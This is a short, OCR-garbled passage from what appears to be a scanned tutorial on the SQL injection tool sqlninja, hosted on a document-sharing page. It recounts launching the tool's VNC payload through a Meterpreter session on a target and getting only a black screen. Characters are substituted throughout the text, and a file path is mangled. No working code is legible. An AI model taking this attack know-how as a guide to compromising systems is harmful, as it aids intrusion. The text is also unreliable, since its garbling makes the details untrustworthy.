;\< d%"nl%aded : c:M/-Q.0.0./-PVTist%r5Tas'es.t1t -: /-Q.0.0./-
PVTist%r5Tas'es.t1t
4eterpreter :
-he EN3 pa)load option loo#s aesome% :ou can vie the demo
*http:++sqlninja%source"orge%net+sqlninjademo%html, "rom the sqlninja ebsite to see it in action% It
or#ed "or me but also didnFt or# "or me% -he EN3 pa)load as uploaded and launched success"ull)
but once the EN3 indo opened all I sa as a blac# screen and a mouse pointer% !) guess is the
connection as too slo to register the mouse movements and screen re"resh% :our mileage ill IFm
var) *and hope"ull) be more success"ul,%

D 01

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

D 01

Uploaded by

Copyright:

Available Formats

SQLNINJA

From the site:

You might also like